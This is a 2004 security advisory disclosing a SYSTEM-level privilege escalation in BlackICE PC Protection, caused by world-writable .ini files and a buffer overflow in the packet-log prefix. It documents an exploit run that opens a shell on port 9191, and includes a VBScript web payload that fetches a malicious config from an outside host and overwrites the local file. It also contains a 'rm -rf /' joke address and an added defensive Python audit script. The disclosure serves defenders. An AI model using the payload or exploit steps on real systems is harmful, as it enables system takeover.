[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM

From: KF (dotslash_at_snosoft.com)
Date: 01/28/04

    Date: Tue, 27 Jan 2004 21:36:46 -0500
    To: bugtraq@securityfocus.com


    Secure Network Operations, Inc. http://www.secnetops.com/research
    Strategic Reconnaissance Team research[at]secnetops[.]com
    Team Lead Contact kf[at]secnetops[.]com
    Spam Contact `rm -rf /`@snosoft.com

    Our Mission:
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    To learn more about our company, products and services or to request a
    demo of ANVIL FCS please visit our site at http://www.secnetops.com, or
    call us at: 978-263-3829

    Quick Summary:
    Advisory Number : SRT2004-01-17-0227
    Product : BlackICE PC Protection
    Version : <= 3.6.cbz ?
    Vendor : http://blackice.iss.net/product_pc_protection.php
    Class : Local
    Criticality : Low to Medium
    Operating System(s) : Win32

    1-2 day Early Warning List:
    Secure Network Operations, Inc. will very shortly have its own advisory
    notification mailing list. This list will notify you of advisories 1-2
    days in advance of public release to other mailing lists. To subscribe
    please visit http://advisories.secnetops.com in the immediate future.

    30-60 day Early Warning List:
    Our early warning service will notify you of new vulnerabilities 30-60
    days in advance of public release. This service has been created to protect
    companies by allowing them to repair security vulnerabilities before they
    become public knowledge. To purchase a one year subscription to this
    service please contact us at 978-263-3767.

    Our advisories will contain full details excluding a working Proof of
    Concept. Our web page will contain our working proof of concept for the
    advisory if it exists. Yes folks, this is a policy change for us. We
    will exercise our own discretion in regards to delay of exploit release
    vs advisory release. List subscribers will have advanced access to working
    proof of concept code depending on the severity and list subscription type.

    Basic Explanation
    High Level Description : BlackICE allows local users to become SYSTEM.
    What to do : Enable BlackICE Application Protection or upgrade.

    Basic Technical Details
    Proof Of Concept Status : Proof of concept is attached to this advisory.

    Low Level Description : BlackICE products provide Intrusion Detection,
    personal firewall, and application protection all in one easy to use package.
    The technology behind BlackICE goes beyond basic file scanning to actually
    monitoring ongoing system activity and communications so that it can
    automatically stop suspect activity before it can harm your system.
    Based on vendor documentation BlackICE will run on the following systems:
    Windows 98 (retail, SP1, Second Edition), Windows NT 4 (SP5, SP6, SP6a),
    Windows 2000 (SP1, SP2, SP3), Windows Me, and Windows XP Pro (SP1) / Home
    (SP1). Note that the suggested browser versions (Internet Explorer 5.0 or
    greater), depending on patch level, may aid in facilitating the attack
    scenarios described below. Please see http://die.leox.com/ie_unpatched/index.html

    The following text is a documentation of my personal experience with BlackICE.
    This text may or may not reflect your experience with BlackICE products. My
    testing and research was done using a random copy of a BlackICE eval
    (BIDEvalSetup27360.exe) that was lying around on an internal file share. I
    took all defaults while installing BlackICE. After clicking next, next, next...
    all the way through the install I ended up with:

    Network ICE BlackICE Defender Rel 2.5.ch EVALUATION
    . blackdll.dll version 2.5.33
    . blackdrv.sys version 2.5.35 (for Win NT/2000)
    . blackdrv.vxd version 2.5.34 (for Win 95/98/Me)
    . blackd.exe version 2.5.36
    . blackice.exe version 2.5.34

    The original ini files are installed as follows. (This is a GOOD thing)
    Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
    $ ls -al *ini
    -rwx------+ 1 Administ None 111 Jan 12 05:59 blackice.ini
    -rwx------+ 1 Administ None 1486 Jan 12 05:59 firewall.ini
    -rwx------+ 1 Administ None 84 Jan 12 05:59 sigs.ini

    You should note that the above files are NOT everyone full control.

    As soon as we open the BlackICE gui we see that there are some nice red
    exclamation marks. In the status window it says [Informational] A firewall
    filter could not be set. Clicking on advICE tells us "To correct this problem,
    make sure you have updated BlackICE to the latest release or patch applicable
    to your operating system".

    That's fair enough... I have no problem updating my old demo. Next we click on
    tools download update. I just accept all defaults and upgrade to version
    3.6cbz. I have to tell it I am still evaluating the product obviously... I am not
    sure if anything changes when you purchase a real version (enter a serial
    number). I have not used any ISS products beyond this particular demo version
    of BlackICE.

    Our version numbers are now:

    Network ICE BlackICE PC Protection Release 3.6.cbz
    . blackdll.dll version 3.6.37
    . BlackDrv.sys version 3.6.37
    . iss-pam1.dll version 3.6.50
    . blackd.exe version 3.6.48
    . blackice.exe version 3.6.44

    After the update to 3.6cbz the local security of our install appears to have
    been downgraded. Above only the Administrator had access to the .ini files. Now
    everyone has full control of them. I feel this causes its own set of security
    issues aside from what we document below.

    Administrator@none /cygdrive/f/Program Files/Network ICE/BlackICE
    $ ls -al *ini
    -rwxrwxrwx+ 1 Administ None 233 Jan 12 06:10 blackice.ini
    -rwxrwxrwx+ 1 Administ None 1605 Jan 12 06:10 firewall.ini
    -rwxrwxrwx+ 1 Administ None 178 Jan 12 06:10 protect.ini
    -rwxrwxrwx+ 1 Administ None 84 Jan 12 06:10 sigs.ini

    The default install options leave Application Protection off... oddly enough I
    had considered turning it on at first but I am a lazy guy, it told me it would
    take "several minutes" to install Application Protection. I was really not
    interested in waiting several minutes. =]

    During the discovery phase there was some disagreement over the various attack
    scenarios. The discussion centered around the multi-user capabilities or lack
    thereof in the above mentioned operating systems. So just for the sake of
    argument the machine that I am evaluating BlackICE on is Windows 2000 Server SP4,
    no terminal services are installed (thus classifying the machine for an Enterprise
    BlackICE solution?). The only service on this machine is VNC. VNC is provided
    so that various individuals (not necessarily administrators) can login to this
    machine remotely. The configuration for VNC is set to "Logoff Workstation when
    last client disconnects" to provide some level of additional security.

    The point of the scenarios below is to show that the config file permissions
    combined with the buffer overflow in the blackd.exe service can be used in
    conjunction with other attacks to further leverage privileges.

    After the install I have rebooted, the login prompt is on the console, and VNC
    is listening just as it was during the installation. From a remote box I connect
    as a user with minimal rights. Upon connecting via VNC I must send control alt
    del and then login. I now have local access to the machine that I am attempting
    to exploit via remote control software. You should note that NO BlackICE warnings
    were triggered by the VNC connection. Keep in mind that BlackICE has not been
    tweaked beyond its initial configuration either.

    Let's see who we are really quick.

    F:\Documents and Settings\kf>whoami

    A quick netstat shows us the ports that are currently open.

    F:\Documents and Settings\kf>netstat -a

    Active Connections

      Proto Local Address Foreign Address State
      TCP none:epmap none:0 LISTENING
      TCP none:microsoft-ds none:0 LISTENING
      TCP none:1025 none:0 LISTENING
      TCP none:1026 none:0 LISTENING
      TCP none:3389 none:0 LISTENING
      TCP none:netbios-ssn none:0 LISTENING
      UDP none:microsoft-ds *:*
      UDP none:netbios-ns *:*
      UDP none:netbios-dgm *:*

    If you look at task manager you will note that blackd.exe is running as SYSTEM.

    After some toying with the GUI we discovered a buffer overflow in the packetLog
    functionality. The overflow can be triggered with the following .ini options.

    [Packet Logging]
    packetLog.fileprefix=<aaaaa...b0f here...aaaaa>

    A 217-character log prefix makes BlackICE blackd crash with the EIP and ECX both
    overwritten with user supplied data.
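    As an added example (not code from the advisory or from ISS), a small Python audit
    that applies the two findings above to a blackice.ini: the world-writable permissions
    the 3.6.cbz update introduced, and a packetLog.fileprefix at or beyond the 217-character
    crash length. The sample .ini files it writes are constructed here, and the threshold
    is the advisory's own figure.

```python
import os
import stat
import tempfile
from configparser import ConfigParser

# Prefix length at which the advisory reports blackd.exe crashing with
# EIP and ECX overwritten; treat anything at or above it as a trigger.
CRASH_PREFIX_LEN = 217

def audit_blackice_ini(path):
    """Return findings for one BlackICE .ini (empty list means clean)."""
    findings = []
    # Check 1: world-writable, as the 3.6.cbz update left the files. The
    # POSIX bits match cygwin's ls; native Windows needs an ACL check.
    mode = os.stat(path).st_mode
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({stat.filemode(mode)})")
    # Check 2: packetLog.fileprefix must stay below the crash length.
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read(path)
    if cp.has_option("Packet Logging", "packetLog.fileprefix"):
        n = len(cp.get("Packet Logging", "packetLog.fileprefix"))
        if n >= CRASH_PREFIX_LEN:
            findings.append(f"{path}: packetLog.fileprefix is {n} chars, "
                            f"at/above crash length {CRASH_PREFIX_LEN}")
    return findings

def _write_sample(prefix, mode):
    """Write a constructed sample .ini (not a file shipped with BlackICE)."""
    fd, path = tempfile.mkstemp(suffix=".ini")
    with os.fdopen(fd, "w") as fh:
        fh.write(f"[Packet Logging]\npacketLog.fileprefix={prefix}\n")
    os.chmod(path, mode)
    return path

def demo():
    """Audit a sane sample and a crash-length, world-writable one."""
    results = {}
    for name, prefix, mode in (("safe", "mylog", 0o600),
                               ("crash", "A" * 217, 0o777)):
        path = _write_sample(prefix, mode)
        try:
            results[name] = audit_blackice_ini(path)
        finally:
            os.unlink(path)
    return results
```

    Point audit_blackice_ini() at the real blackice.ini path to check an installed copy; demo() only exercises the two constructed samples.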

    We simply run the BlackICE exploit that we prepared for the above condition.

    F:\Documents and Settings\kf> perl BlackICEdefender_ex.pl

    Wait a bit for the FileChange Event to trigger, or trigger any alert yourself.
    SSH traffic seemed like a quick and easy alert to trigger in the event the file
    changes are not detected immediately.

    F:\Program Files\Network ICE\BlackICE>telnet 22
    Connecting To
    SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2.1
                                                    Protocol mismatch.

    Check what’s listening again. You should note the new port 9191 in the list.

    F:\Documents and Settings\kf>netstat -a

    Active Connections

      Proto Local Address Foreign Address State
      TCP none:epmap none:0 LISTENING
      TCP none:microsoft-ds none:0 LISTENING
      TCP none:1025 none:0 LISTENING
      TCP none:1026 none:0 LISTENING
      TCP none:3389 none:0 LISTENING
      TCP none:9191 none:0 LISTENING
      TCP none:netbios-ssn none:0 LISTENING
      UDP none:microsoft-ds *:*
      UDP none:netbios-ns *:*
      UDP none:netbios-dgm *:*

    F:\Documents and Settings\kf>telnet localhost 9191
    Connecting To localhost...

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    F:\Program Files\Network ICE\BlackICE>whoami

    At this point we pretty much have the equivalent of root access to this
    Windows machine.

    Without local access to the machine I feel that it is still quite trivial
    to trigger this vulnerability. A quick trip to http://die.leox.com/ie_unpatched/
    gave me enough to prove the basic point. The following Full-Disclosure post
    outlines the attack and its limitations.


    Obviously the example requires interaction from a victim. I am sure there is no
    shortage of other bugs that could deliver a malicious blackice.ini.

    <script language="vbscript">
    ' ADODB.Stream constants
    const adTypeBinary = 1
    const adSaveCreateOverwrite = 2
    const adModeReadWrite = 3
    ' Fetch the replacement blackice.ini; the request is not issued until .send
    set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
    xmlHTTP.open "GET","http://www.snosoft.com/blackice.ini",false
    xmlHTTP.send
    contents = xmlHTTP.responseBody
    ' Write the bytes over the local config; this only works because the
    ' 3.6.cbz update left the .ini Everyone full control and the page runs
    ' in the MyComputer zone, where ADODB.Stream may touch the file system
    Set oStr = CreateObject("ADODB.Stream")
    oStr.Mode = adModeReadWrite
    oStr.Type = adTypeBinary
    oStr.Open
    oStr.Write contents
    oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
    oStr.Close
    </script>

    Opening the above html file from within the MyComputer zone would cause the
    blackice.ini to be overwritten.

    The final note I have to include on this advisory is that the BlackICE Application
    Protection DOES work... so use it. When the AP is enabled this attack is not
    possible because BlackICE simply will not allow the config files to be modified.

    Functional PoC can be located in the archives at http://advisories.secnetops.com

    Vendor Status : Vendor fixes should be available as of 1/27/04

    Bugtraq URL : To be assigned.

    This advisory was released by Secure Network Operations, Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Release of exploit code is done at our
    own discretion.
    All content of this advisory is property of Secure Network Operations.
    Secure Network Operations, Inc. || http://www.secnetops.com
    "Embracing the future of technology, protecting you."

